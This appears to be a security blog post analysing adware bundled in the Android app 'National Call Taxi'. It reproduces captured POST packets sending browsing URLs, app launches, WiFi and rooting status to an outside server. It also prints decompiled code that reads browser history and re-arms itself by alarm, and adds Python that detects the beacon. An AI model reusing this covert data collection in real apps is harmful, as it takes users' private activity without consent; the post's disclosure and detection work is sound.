User Activities Leakage with Free App

This free Android app transfers the device state and the user's activities without the user's consent. An adware module bundled with the free app collects the internet access history and the history of launched apps on the device where it is installed.

Free app: National Call Taxi – 전국 콜텍시(Korean)
Google Play: https://play.google.com/store/apps/details?id=kr.baccharis.callTaxi

The name of each launched app and each accessed URL are sent to an external server whenever the user launches an app or browses the web with a mobile browser while the 'National Call Taxi' app is running, in the foreground or in the background. The malicious code is NOT part of the app's main source; it is included in the advertising (adware) module that the app bundles for profit.

The leaked data includes the accessed URL, the access time, the rooting status, the WiFi status and a device serial number (not a real device UUID; it is randomly generated).

[Sending Packet(URL Access)]

POST /servlet/Navvy.mawrite3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)
Host: ma01.mediachannel.co.kr
Connection: Keep-Alive
Accept-Encoding: gzip

ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=web&ldt=20130418162111&nsf=23554400003&wifi=wifi&rooting=0&data=0
http://www.google.co.kr/029.50820130418162111

[Sending Packet(App Execution)]

POST /servlet/Navvy.mawrite3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)
Host: ma01.mediachannel.co.kr
Connection: Keep-Alive
Accept-Encoding: gzip

ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=app&ldt=20130418162138&nsf=811915200069&wifi=wifi&rooting=0&data=
0201304181620222013041816213876.0com.android.browserandroid

[Sending Information]

– Malicious app version and name
– Serial number (randomly generated UUID)
– Type: app (app execution) or web (web access)
– WiFi and rooting status
– Executed app name or accessed URL
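Both captured packets share one form-encoded layout, which is enough to detect the beacon on the wire. The following Python is an added example, not code from the original post: it parses a captured HTTP request, matches it against the servlet path and host seen above, and extracts the leaked fields plus the visited URL so a network monitor could alert on it. The sample request is constructed from the URL-access packet above; the parsing and alert logic are my own.

```python
import re
from urllib.parse import parse_qs

# Indicators taken from the captured packets in the post.
BEACON_HOST = "ma01.mediachannel.co.kr"
BEACON_PATH = "/servlet/Navvy.mawrite3"
# Form fields the adware sends; "data" carries the visited URL or the launched-app record.
LEAK_FIELDS = ("ver", "collectapp", "serial", "ltype", "ldt", "nsf", "wifi", "rooting", "data")

# Constructed sample, modelled on the "URL Access" packet above (some headers trimmed).
SAMPLE_REQUEST = (
    "POST /servlet/Navvy.mawrite3 HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: ma01.mediachannel.co.kr\r\n"
    "\r\n"
    "ver=2.0.1&collectapp=kr.baccharis.callTaxi"
    "&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=web&ldt=20130418162111"
    "&nsf=23554400003&wifi=wifi&rooting=0&data=0\n"
    "http://www.google.co.kr/029.50820130418162111"
)

def parse_beacon(raw):
    """Return the leaked fields of one captured HTTP request, or None if it is not the beacon."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        return None
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Alert on either the host or the servlet path, so a moved domain is still caught.
    if headers.get("host") != BEACON_HOST and parts[1] != BEACON_PATH:
        return None
    form = parse_qs(body, keep_blank_values=True)
    record = {k: form.get(k, [""])[0] for k in LEAK_FIELDS}
    # The visited URL sits inside the data field; pull it out for the alert text.
    match = re.search(r"https?://\S+", record["data"])
    record["url"] = match.group(0) if match else None
    return record

def alert_line(record):
    """One-line summary suitable for a log or SIEM event."""
    what = record["url"] if record["ltype"] == "web" else "app launch"
    return (f"{record['collectapp']} leaked {record['ltype']} activity: {what} "
            f"(wifi={record['wifi']}, rooting={record['rooting']}, serial={record['serial']})")
```

Running `alert_line(parse_beacon(SAMPLE_REQUEST))` yields one event line naming the app, the visited URL and the device state the beacon carried.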

I decompiled the malicious app and reviewed the code of the malicious functions.

[UUID Generation]


private String w() {
    String str = "";
    try {
        // The "serial" sent in every packet is a random UUID, not a hardware identifier
        str = UUID.randomUUID().toString();
        new StringBuilder("CreateSerial : ").append(str).toString();  // leftover debug/log message
        b(str);  // b() is not shown here; presumably it persists the serial for reuse
    } catch (Exception localException) {
        // exception is swallowed; an empty serial is returned
    }
    return str;
}

[Browser History Access]

unregisterReceiver(this.s);
stopSelf();
// Re-arms itself: the service is rescheduled through an alarm that broadcasts a restart intent
// (g.g.set(int, long, PendingIntent) matches AlarmManager.set; type 2 is ELAPSED_REALTIME_WAKEUP)
Intent localIntent = new Intent(this, revRankey.class);
localIntent.putExtra("appwebCollect", 4500);
localIntent.setAction("Action.Restart.MediaChannelService");
PendingIntent localPendingIntent = PendingIntent.getBroadcast(this, 0, localIntent, 0);
g.g.set(2, 10000L, localPendingIntent);
if (localObject4 == null)
    continue;
((Cursor)localObject4).close();
return;
// Queries the stock browser's history, only rows newer than the stored timestamp g.i
Cursor localCursor1 = g.e.query(Browser.BOOKMARKS_URI, Browser.HISTORY_PROJECTION, "date > " + g.i, null, "date");
localObject4 = localCursor1;
break;
// Walks the result set from the newest entry backwards
((Cursor)localObject4).moveToLast();
((Cursor)localObject4).getCount();
localObject5 = "";
if (!((Cursor)localObject4).isBeforeFirst())
    continue;
if (localObject1 == null)
    continue;
boolean bool1 = localObject1.contentEquals("0");
if (!bool1)
    break label509;
if (localObject4 == null)

Some adware collects user behaviour and internet access history, and advertising companies extract value from that data for their marketing. I guess that the web access and app launch data collected by this malicious app would be used for a similar purpose. But the WiFi status and rooting condition could also be used to break into the device. I already reported the issue on Facebook, warning that other apps that include this adware could be exposed to the same security issue.
